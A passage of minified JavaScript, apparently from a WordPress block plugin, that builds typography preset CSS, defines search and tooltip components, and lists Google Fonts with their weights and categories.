h1,\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n            html body.postx-admin-page .editor-styles-wrapper p, html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                font-family: var(--postx_preset_Body_and_Others_typo_font_family),var(--postx_preset_Body_and_Others_typo_font_family_type); \n                font-weight: var(--postx_preset_Body_and_Others_typo_font_weight);\n                font-style: var(--postx_preset_Body_and_Others_typo_font_style);\n                text-transform: var(--postx_preset_Body_and_Others_typo_text_transform);\n                text-decoration: var(--postx_preset_Body_and_Others_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_lg, normal);\n                font-size: var(--postx_preset_body_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_body_typo_line_height_lg, normal) !important;\n            }\n            @media (max-width: ${t.breakpointSm||991}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_sm, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_sm, normal) !important;\n                }\n            }\n            @media (max-width: ${t.breakpointXs||767}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_xs, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),e}},i=(e,t)=>{localStorage.setItem(e,JSON.stringify(t))},l=(e,t={})=>{try{return JSON.parse(e)}catch(e){return t}}},2402:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(4201);const r=({searchQuery:e,setSearchQuery:t,setTemplateModule:n,changeStates:r})=>(0,a.createElement)("div",{className:"ultp-design-search-wrapper"},(0,a.createElement)("input",{type:"search",id:"ultp-design-search-form",className:"ultp-design-search-input",placeholder:"Search for...",value:e,onChange:e=>{t&&t(e.target.value),n&&n(""),r&&r("search",e.target.value)}}))},3100:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(2044);const r=(e,t,n,r)=>(0,a.Z)({url:e||null,utmKey:t||null,affiliate:n||null,hash:r||null})},4190:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(2158);const r=e=>{let t;const[n,r]=(0,a.useState)(!1);return(0,a.createElement)("div",{className:`ultp-tooltip-wrapper ${e.extraClass}`,onMouseEnter:()=>{t=setTimeout((()=>{r(!0)}),e.delay||400)},onMouseLeave:()=>{clearInterval(t),r(!1)}},e.children,n&&(0,a.createElement)("div",{className:`tooltip-content ${e.direction||"top"}`},e.content))}},2030:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=[{n:"ABeeZee",v:[400,"400i"],f:"sans-serif"},{n:"Abel",v:[400],f:"sans-serif"},{n:"Abhaya Libre",v:[400,500,600,700,800],f:"serif"},{n:"Abril Fatface",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Aclonica",v:[400],f:"sans-serif"},{n:"Acme",v:[400],f:"sans-serif"},{n:"Actor",v:[400],f:"sans-serif"},{n:"Adamina",v:[400],f:"serif"},{n:"Advent Pro",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aguafina Script",v:[400],f:"handwriting"},{n:"Akaya Kanadaka",v:[400],f:"display"},{n:"Akaya Telivigala",v:[400],f:"display"},{n:"Akronim",v:[400],f:"display"},{n:"Akshar",v:["300",400,500,600,700],f:"sans-serif"},{n:"Aladin",v:[400],f:"handwriting"},{n:"Alata",v:[400],f:"sans-serif"},{n:"Alatsi",v:[400],f:"sans-serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aldrich",v:[400],f:"sans-serif"},{n:"Alef",v:[400,700],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alegreya",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Alegreya SC",v:[400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Alegreya Sans",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Alegreya Sans SC",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Aleo",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Alex Brush",v:[400],f:"handwriting"},{n:"Alfa Slab One",v:[400],f:"display"},{n:"Alice",v:[400],f:"serif"},{n:"Alike",v:[400],f:"serif"},{n:"Alike Angular",v:[400],f:"serif"},{n:"Allan",v:[400,700],f:"display"},{n:"Allerta",v:[400],f:"sans-serif"},{n:"Allerta Stencil",v:[400],f:"sans-serif"},{n:"Allison",v:[400],f:"handwriting"},{n:"Allura",v:[400],f:"handwriting"},{n:"Almarai",v:["300",400,700,800],f:"sans-serif"},{n:"Almendra",v:[400,"400i",700,"700i"],f:"serif"},{n:"Almendra Display",v:[400],f:"display"},{n:"Almendra SC",v:[400],f:"serif"},{n:"Alumni Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alumni Sans Inline One",v:[400,"400i"],f:"display"},{n:"Amarante",v:[400],f:"display"},{n:"Amaranth",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Amatic SC",v:[400,700],f:"handwriting"},{n:"Amethysta",v:[400],f:"serif"},{n:"Amiko",v:[400,600,700],f:"sans-serif"},{n:"Amiri",v:[400,"400i",700,"700i"],f:"serif"},{n:"Amita",v:[400,700],f:"handwriting"},{n:"Anaheim",v:[400],f:"sans-serif"},{n:"Andada Pro",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Andika",v:[400],f:"sans-serif"},{n:"Anek Bangla",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Devanagari",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gujarati",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gurmukhi",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Kannada",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Latin",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Malayalam",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Odia",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Tamil",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Telugu",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Angkor",v:[400],f:"display"},{n:"Annie Use Your Telescope",v:[400],f:"handwriting"},{n:"Anonymous Pro",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Antic",v:[400],f:"sans-serif"},{n:"Antic Didone",v:[400],f:"serif"},{n:"Antic Slab",v:[400],f:"serif"},{n:"Anton",v:[400],f:"sans-serif"},{n:"Antonio",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Anybody",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Arapey",v:[400,"400i"],f:"serif"},{n:"Arbutus",v:[400],f:"display"},{n:"Arbutus Slab",v:[400],f:"serif"},{n:"Architects Daughter",v:[400],f:"handwriting"},{n:"Archivo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Archivo Black",v:[400],f:"sans-serif"},{n:"Archivo Narrow",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Are You Serious",v:[400],f:"handwriting"},{n:"Aref Ruqaa",v:[400,700],f:"serif"},{n:"Arimo",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Arizonia",v:[400],f:"handwriting"},{n:"Armata",v:[400],f:"sans-serif"},{n:"Arsenal",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Artifika",v:[400],f:"serif"},{n:"Arvo",v:[400,"400i",700,"700i"],f:"serif"},{n:"Arya",v:[400,700],f:"sans-serif"},{n:"Asap",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Asap Condensed",v:[200,"200i",300,"300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Asar",v:[400],f:"serif"},{n:"Asset",v:[400],f:"display"},{n:"Assistant",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Astloch",v:[400,700],f:"display"},{n:"Asul",v:[400,700],f:"sans-serif"},{n:"Athiti",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Atkinson Hyperlegible",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Atma",v:["300",400,500,600,700],f:"display"},{n:"Atomic Age",v:[400],f:"display"},{n:"Aubrey",v:[400],f:"display"},{n:"Audiowide",v:[400],f:"display"},{n:"Autour One",v:[400],f:"display"},{n:"Average",v:[400],f:"serif"},{n:"Average Sans",v:[400],f:"sans-serif"},{n:"Averia Gruesa Libre",v:[400],f:"display"},{n:"Averia Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Sans Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Serif Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Azeret Mono",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Aboreto",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alkalami",v:[400],f:"serif"},{n:"Alkatra",v:[400,500,600,700],f:"display"},{n:"Alumni Sans Collegiate One",v:[400,"400i"],f:"sans-serif"},{n:"Alumni Sans Pinstripe",v:[400,"400i"],f:"sans-serif"},{n:"Amiri Quran",v:[400],f:"serif"},{n:"Anuphan",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Aoboshi One",v:[400],f:"serif"},{n:"Aref Ruqaa Ink",v:[400,700],f:"serif"},{n:"Arima",v:[100,200,300,400,500,600,700],f:"display"},{n:"B612",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"B612 Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"BIZ UDGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDMincho",v:[400,700],f:"serif"},{n:"BIZ UDPGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDPMincho",v:[400,700],f:"serif"},{n:"Babylonica",v:[400],f:"handwriting"},{n:"Bad Script",v:[400],f:"handwriting"},{n:"Bahiana",v:[400],f:"display"},{n:"Bahianita",v:[400],f:"display"},{n:"Bai Jamjuree",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Bakbak One",v:[400],f:"display"},{n:"Ballet",v:[400],f:"handwriting"},{n:"Baloo 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhai 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaijaan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaina 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Chettan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Da 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Paaji 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tamma 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tammudu 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Thambi 2",v:[400,500,600,700,800],f:"display"},{n:"Balsamiq Sans",v:[400,"400i",700,"700i"],f:"display"},{n:"Balthazar",v:[400],f:"serif"},{n:"Bangers",v:[400],f:"display"},{n:"Barlow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Semi Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barriecito",v:[400],f:"display"},{n:"Barrio",v:[400],f:"display"},{n:"Basic",v:[400],f:"sans-serif"},{n:"Baskervville",v:[400,"400i"],f:"serif"},{n:"Battambang",v:["100","300",400,700,900],f:"display"},{n:"Baumans",v:[400],f:"display"},{n:"Bayon",v:[400],f:"sans-serif"},{n:"Be Vietnam Pro",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Beau Rivage",v:[400],f:"handwriting"},{n:"Bebas Neue",v:[400],f:"sans-serif"},{n:"Belgrano",v:[400],f:"serif"},{n:"Bellefair",v:[400],f:"serif"},{n:"Belleza",v:[400],f:"sans-serif"},{n:"Bellota",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Bellota Text",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"BenchNine",v:["300",400,700],f:"sans-serif"},{n:"Benne",v:[400],f:"serif"},{n:"Bentham",v:[400],f:"serif"},{n:"Berkshire Swash",v:[400],f:"handwriting"},{n:"Besley",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Beth Ellen",v:[400],f:"handwriting"},{n:"Bevan",v:[400,"400i"],f:"display"},{n:"BhuTuka Expanded One",v:[400],f:"display"},{n:"Big Shoulders Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Bigelow Rules",v:[400],f:"display"},{n:"Bigshot One",v:[400],f:"display"},{n:"Bilbo",v:[400],f:"handwriting"},{n:"Bilbo Swash Caps",v:[400],f:"handwriting"},{n:"BioRhyme",v:["200","300",400,700,800],f:"serif"},{n:"BioRhyme Expanded",v:["200","300",400,700,800],f:"serif"},{n:"Birthstone",v:[400],f:"handwriting"},{n:"Birthstone Bounce",v:[400,500],f:"handwriting"},{n:"Biryani",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bitter",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Black And White Picture",v:[400],f:"sans-serif"},{n:"Black Han Sans",v:[400],f:"sans-serif"},{n:"Black Ops One",v:[400],f:"display"},{n:"Blinker",v:["100","200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bodoni Moda",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Bokor",v:[400],f:"display"},{n:"Bona Nova",v:[400,"400i",700],f:"serif"},{n:"Bonbon",v:[400],f:"handwriting"},{n:"Bonheur Royale",v:[400],f:"handwriting"},{n:"Boogaloo",v:[400],f:"display"},{n:"Bowlby One",v:[400],f:"display"},{n:"Bowlby One SC",v:[400],f:"display"},{n:"Brawler",v:[400,700],f:"serif"},{n:"Bree Serif",v:[400],f:"serif"},{n:"Brygada 1918",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Bubblegum Sans",v:[400],f:"display"},{n:"Bubbler One",v:[400],f:"sans-serif"},{n:"Buda",v:["300"],f:"display"},{n:"Buenard",v:[400,700],f:"serif"},{n:"Bungee",v:[400],f:"display"},{n:"Bungee Hairline",v:[400],f:"display"},{n:"Bungee Inline",v:[400],f:"display"},{n:"Bungee Outline",v:[400],f:"display"},{n:"Bungee Shade",v:[400],f:"display"},{n:"Butcherman",v:[400],f:"display"},{n:"Butterfly Kids",v:[400],f:"handwriting"},{n:"Blaka",v:[400],f:"display"},{n:"Blaka Hollow",v:[400],f:"display"},{n:"Blaka Ink",v:[400],f:"display"},{n:"Braah One",v:[400],f:"sans-serif"},{n:"Bruno Ace",v:[400],f:"display"},{n:"Bruno Ace SC",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Cabin",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cabin Condensed",v:[400,500,600,700],f:"sans-serif"},{n:"Cabin Sketch",v:[400,700],f:"display"},{n:"Caesar Dressing",v:[400],f:"display"},{n:"Cagliostro",v:[400],f:"sans-serif"},{n:"Cairo",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caladea",v:[400,"400i",700,"700i"],f:"serif"},{n:"Calistoga",v:[400],f:"display"},{n:"Calligraffitti",v:[400],f:"handwriting"},{n:"Cambay",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cambo",v:[400],f:"serif"},{n:"Candal",v:[400],f:"sans-serif"},{n:"Cantarell",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cantata One",v:[400],f:"serif"},{n:"Cantora One",v:[400],f:"sans-serif"},{n:"Capriola",v:[400],f:"sans-serif"},{n:"Caramel",v:[400],f:"handwriting"},{n:"Carattere",v:[400],f:"handwriting"},{n:"Cardo",v:[400,"400i",700],f:"serif"},{n:"Carme",v:[400],f:"sans-serif"},{n:"Carrois Gothic",v:[400],f:"sans-serif"},{n:"Carrois Gothic SC",v:[400],f:"sans-serif"},{n:"Carter One",v:[400],f:"display"},{n:"Castoro",v:[400,"400i"],f:"serif"},{n:"Catamaran",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caudex",v:[400,"400i",700,"700i"],f:"serif"},{n:"Caveat",v:[400,500,600,700],f:"handwriting"},{n:"Caveat Brush",v:[400],f:"handwriting"},{n:"Cedarville Cursive",v:[400],f:"handwriting"},{n:"Ceviche One",v:[400],f:"display"},{n:"Chakra Petch",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Changa",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Changa One",v:[400,"400i"],f:"display"},{n:"Chango",v:[400],f:"display"},{n:"Charm",v:[400,700],f:"handwriting"},{n:"Charmonman",v:[400,700],f:"handwriting"},{n:"Chathura",v:["100","300",400,700,800],f:"sans-serif"},{n:"Chau Philomene One",v:[400,"400i"],f:"sans-serif"},{n:"Chela One",v:[400],f:"display"},{n:"Chelsea Market",v:[400],f:"display"},{n:"Chenla",v:[400],f:"display"},{n:"Cherish",v:[400],f:"handwriting"},{n:"Cherry Cream Soda",v:[400],f:"display"},{n:"Cherry Swash",v:[400,700],f:"display"},{n:"Chewy",v:[400],f:"display"},{n:"Chicle",v:[400],f:"display"},{n:"Chilanka",v:[400],f:"handwriting"},{n:"Chivo",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Chonburi",v:[400],f:"display"},{n:"Cinzel",v:[400,500,600,700,800,900],f:"serif"},{n:"Cinzel Decorative",v:[400,700,900],f:"display"},{n:"Clicker Script",v:[400],f:"handwriting"},{n:"Coda",v:[400,800],f:"display"},{n:"Coda Caption",v:[800],f:"sans-serif"},{n:"Codystar",v:["300",400],f:"display"},{n:"Coiny",v:[400],f:"display"},{n:"Combo",v:[400],f:"display"},{n:"Comfortaa",v:["300",400,500,600,700],f:"display"},{n:"Comforter",v:[400],f:"handwriting"},{n:"Comforter Brush",v:[400],f:"handwriting"},{n:"Comic Neue",v:["300","300i",400,"400i",700,"700i"],f:"handwriting"},{n:"Coming Soon",v:[400],f:"handwriting"},{n:"Commissioner",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Concert One",v:[400],f:"display"},{n:"Condiment",v:[400],f:"handwriting"},{n:"Content",v:[400,700],f:"display"},{n:"Contrail One",v:[400],f:"display"},{n:"Convergence",v:[400],f:"sans-serif"},{n:"Cookie",v:[400],f:"handwriting"},{n:"Copse",v:[400],f:"serif"},{n:"Corben",v:[400,700],f:"display"},{n:"Corinthia",v:[400,700],f:"handwriting"},{n:"Cormorant",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Cormorant Garamond",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant Infant",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant SC",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Unicase",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Upright",v:["300",400,500,600,700],f:"serif"},{n:"Courgette",v:[400],f:"handwriting"},{n:"Courier Prime",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Cousine",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Coustard",v:[400,900],f:"serif"},{n:"Covered By Your Grace",v:[400],f:"handwriting"},{n:"Crafty Girls",v:[400],f:"handwriting"},{n:"Creepster",v:[400],f:"display"},{n:"Crete Round",v:[400,"400i"],f:"serif"},{n:"Crimson Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Croissant One",v:[400],f:"display"},{n:"Crushed",v:[400],f:"display"},{n:"Cuprum",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cute Font",v:[400],f:"display"},{n:"Cutive",v:[400],f:"serif"},{n:"Cutive Mono",v:[400],f:"monospace"},{n:"Cairo Play",v:[200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Carlito",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Castoro Titling",v:[400],f:"display"},{n:"Charis SIL",v:[400,"400i",700,"700i"],f:"serif"},{n:"Cherry Bomb One",v:[400],f:"display"},{n:"Chivo Mono",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Chokokutai",v:[400],f:"display"},{n:"Climate Crisis",v:[400],f:"display"},{n:"Comme",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Crimson Text",v:[400,"400i",600,"600i",700,"700i"],f:"serif"},{n:"DM Mono",v:["300","300i",400,"400i",500,"500i"],f:"monospace"},{n:"DM Sans",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"DM Serif Display",v:[400,"400i"],f:"serif"},{n:"DM Serif Text",v:[400,"400i"],f:"serif"},{n:"Damion",v:[400],f:"handwriting"},{n:"Dancing Script",v:[400,500,600,700],f:"handwriting"},{n:"Dangrek",v:[400],f:"display"},{n:"Darker Grotesque",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"David Libre",v:[400,500,700],f:"serif"},{n:"Dawning of a New Day",v:[400],f:"handwriting"},{n:"Days One",v:[400],f:"sans-serif"},{n:"Dekko",v:[400],f:"handwriting"},{n:"Dela Gothic One",v:[400],f:"display"},{n:"Delius",v:[400],f:"handwriting"},{n:"Delius Swash Caps",v:[400],f:"handwriting"},{n:"Delius Unicase",v:[400,700],f:"handwriting"},{n:"Della Respira",v:[400],f:"serif"},{n:"Denk One",v:[400],f:"sans-serif"},{n:"Devonshire",v:[400],f:"handwriting"},{n:"Dhurjati",v:[400],f:"sans-serif"},{n:"Didact Gothic",v:[400],f:"sans-serif"},{n:"Diplomata",v:[400],f:"display"},{n:"Diplomata SC",v:[400],f:"display"},{n:"Do Hyeon",v:[400],f:"sans-serif"},{n:"Dokdo",v:[400],f:"handwriting"},{n:"Domine",v:[400,500,600,700],f:"serif"},{n:"Donegal One",v:[400],f:"serif"},{n:"Dongle",v:["300",400,700],f:"sans-serif"},{n:"Doppio One",v:[400],f:"sans-serif"},{n:"Dorsa",v:[400],f:"sans-serif"},{n:"Dosis",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"DotGothic16",v:[400],f:"sans-serif"},{n:"Dr Sugiyama",v:[400],f:"handwriting"},{n:"Duru Sans",v:[400],f:"sans-serif"},{n:"Dynalight",v:[400],f:"display"},{n:"Darumadrop One",v:[400],f:"display"},{n:"Delicious Handrawn",v:[400],f:"handwriting"},{n:"DynaPuff",v:[400,500,600,700],f:"display"},{n:"Edu NSW ACT Foundation",v:[400,500,600,700],f:"handwriting"},{n:"EB Garamond",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Eagle Lake",v:[400],f:"handwriting"},{n:"East Sea Dokdo",v:[400],f:"handwriting"},{n:"Eater",v:[400],f:"display"},{n:"Economica",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Eczar",v:[400,500,600,700,800],f:"serif"},{n:"El Messiri",v:[400,500,600,700],f:"sans-serif"},{n:"Electrolize",v:[400],f:"sans-serif"},{n:"Elsie",v:[400,900],f:"display"},{n:"Elsie Swash Caps",v:[400,900],f:"display"},{n:"Emblema One",v:[400],f:"display"},{n:"Emilys Candy",v:[400],f:"display"},{n:"Encode Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans SC",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi 